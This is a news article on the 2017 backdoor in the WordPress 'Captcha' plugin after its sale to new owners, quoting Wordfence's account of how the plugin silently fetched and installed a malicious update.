Popular Wordpress Plugin compromised with malicious code

A popular Wordpress plug-in installed on around 300,000 websites has been compromised with malicious code opening a back door into the websites.

Wordpress stumbled across the plug-in and banned it from the official WordPress Plugins store. They've also sent users updated versions of the plug-in with the malicious code removed.

The plug-in, called Captcha, was a popular piece of CAPTCHA software developed by Wordpress development company BestWebSoft. However, the latest version has been plagued with security problems.

These problems started three months after BestWebSoft sold the free version of the plug-in to an organisation called Simply Wordpress. The developer recently unveiled version 4.3.7 of Captcha.

"Recently, we've handed over all the rights to use and manage the free version of Captcha plugin. Now, it has new owners which are responsible for the updates, troubleshooting and support any processes connected with its free version," the firm said in September.

This version contained malicious code allowing it to connect to the simplywordpress.net website and install a plugin update package without the user knowing.

Such an act is against Wordpress rules, and effectively creates a backdoor without users knowing. It also makes it easier for cyber crooks to hijack websites.

This isn't the only issue with the plug-in, though. The plug-in also has code that enables attackers to remove traces of the backdoor, giving them the ability to cover up their tracks.

Worryingly, security specialists wouldn't have come across the flaw if the Wordpress team hadn't have removed the plug-in on copyright grounds.

The organisation accused the plug-in's new developer of violating its copyright by using "Wordpress" in the name and branding of Captcha.

Once this happened, cyber security firm Wordfence was alerted about the removal and came across the security vulnerability. It creates firewall products for Wordpress sites.

Wordpress has removed the plug-in from its repository completely and is forcing websites to install the updated version. More than 100,000 websites have completed the update so far.

Matt Barry, a security specialist at Wordfence, said: "Whenever the WordPress repository removes a plug-in with a large user base, we check to see if it was possibly due to something security-related.

"Wordfence alerts users when any plug-in they are running is removed from WordPress repo as well. At the time of its removal, Captcha had over 300,000 active installs, so its removal significantly impacts many users."

He explained: "This code triggers an automatic update process that downloads a ZIP file from https://simplywordpress\\[dot]net/captcha/captcha\\_pro\\_update.php, then extracts and installs itself over the copy of the Captcha plugin running on site.

"The ZIP contains a few small code changes from what is in the plugin repository, and it also contains a file called plugin-update.php, which is a backdoor."

Plug-ins to widely used software, such as Wordpress or web browsers, have increasingly been targeted by companies looking to inject adware or other forms of unwanted code.

The legitimate developer of the plug-in is tempted to sell to a third party, and the third party then updates the plug-in with malicious code.